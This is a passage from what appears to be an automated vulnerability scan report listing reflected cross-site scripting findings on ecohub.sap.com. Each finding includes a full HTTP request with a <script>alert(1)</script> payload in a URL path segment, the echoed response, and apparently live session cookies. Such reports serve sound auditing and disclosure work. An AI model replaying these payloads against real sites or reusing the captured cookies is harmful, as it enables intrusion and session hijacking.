Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 85
Cache-Control: public, max-age=86370
Expires: Sun, 16 Oct 2011 14:25:16 GMT
Date: Sat, 15 Oct 2011 14:25:46 GMT
Connection: close

File not found: /img/banners7c1bb<script>alert(1)</script>a2aabb6bf4e/Madrid.288.png

3.7. http://ecohub.sap.com/img/banners/Madrid.288.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/Madrid.288.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 60bc8<script>alert(1)</script>bf2497c4639 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners/Madrid.288.png60bc8<script>alert(1)</script>bf2497c4639?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 85
Date: Sat, 15 Oct 2011 14:25:46 GMT
Connection: close

File not found: /img/banners/Madrid.288.png60bc8<script>alert(1)</script>bf2497c4639

3.8. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/womanmanmonitor_vertical.jpg

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ebf5<script>alert(1)</script>6d25fbe996 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img8ebf5<script>alert(1)</script>6d25fbe996/banners/womanmanmonitor_vertical.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 98
Cache-Control: public, max-age=86361
Expires: Sun, 16 Oct 2011 14:25:01 GMT
Date: Sat, 15 Oct 2011 14:25:40 GMT
Connection: close

File not found: /img8ebf5<script>alert(1)</script>6d25fbe996/banners/womanmanmonitor_vertical.jpg

3.9. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/womanmanmonitor_vertical.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 142c9<script>alert(1)</script>9524fe82742 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners142c9<script>alert(1)</script>9524fe82742/womanmanmonitor_vertical.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 99
Cache-Control: public, max-age=86355
Expires: Sun, 16 Oct 2011 14:24:59 GMT
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/banners142c9<script>alert(1)</script>9524fe82742/womanmanmonitor_vertical.jpg

3.10. http://ecohub.sap.com/img/banners/womanmanmonitor_vertical.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/womanmanmonitor_vertical.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c97fa<script>alert(1)</script>efe729d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners/womanmanmonitor_vertical.jpgc97fa<script>alert(1)</script>efe729d14?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 97
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/banners/womanmanmonitor_vertical.jpgc97fa<script>alert(1)</script>efe729d14

3.11. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/world-tour.288.jpg

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d7ad<script>alert(1)</script>af916879b70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img4d7ad<script>alert(1)</script>af916879b70/banners/world-tour.288.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 89
Cache-Control: public, max-age=86387
Expires: Sun, 16 Oct 2011 14:25:30 GMT
Date: Sat, 15 Oct 2011 14:25:43 GMT
Connection: close

File not found: /img4d7ad<script>alert(1)</script>af916879b70/banners/world-tour.288.jpg

3.12. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/world-tour.288.jpg

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5f4a<script>alert(1)</script>145318725a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/bannersa5f4a<script>alert(1)</script>145318725a4/world-tour.288.jpg?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 89
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:44 GMT
Date: Sat, 15 Oct 2011 14:25:44 GMT
Connection: close

File not found: /img/bannersa5f4a<script>alert(1)</script>145318725a4/world-tour.288.jpg

3.13. http://ecohub.sap.com/img/banners/world-tour.288.jpg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/banners/world-tour.288.jpg

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 95f6f<script>alert(1)</script>da42c3dd6dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/banners/world-tour.288.jpg95f6f<script>alert(1)</script>da42c3dd6dc?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 89
Date: Sat, 15 Oct 2011 14:25:45 GMT
Connection: close

File not found: /img/banners/world-tour.288.jpg95f6f<script>alert(1)</script>da42c3dd6dc

3.14. http://ecohub.sap.com/img/empty.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/empty.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 664f2<script>alert(1)</script>a81d0f7539a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img664f2<script>alert(1)</script>a81d0f7539a/empty.gif?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690493228%3B%20pe%3Dno%2520value%7C1318690493231%3B%20c3%3Dscn%253Ablog%253Acategory%253Asap%2520teched%7C1318690493233%3B%20s_nr%3D1318688693239-New%7C1321280693239%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292293242%3B%20s_visit%3D1%7C1318690493243%3B%20gpv_p47%3Dno%2520value%7C1318690493245%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3D%3B; VisitID=QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==; Unique=QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==; ; SDNSTATE=1834225836.14340.0000; rack.session=BAh7BzoLdXNlcklkIgA6EGRpc3BsYXlOYW1lIgA%3D%0A--e9bcbd9b38efcc777ce9632a16fe98ce5215ed13

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 72
Cache-Control: public, max-age=86400
Expires: Sun, 16 Oct 2011 14:25:25 GMT
Date: Sat, 15 Oct 2011 14:25:25 GMT
Connection: close

File not found: /img664f2<script>alert(1)</script>a81d0f7539a/empty.gif

3.15. http://ecohub.sap.com/img/empty.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /img/empty.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f16e8<script>alert(1)</script>8de76daedec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /img/empty.giff16e8<script>alert(1)</script>8de76daedec?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
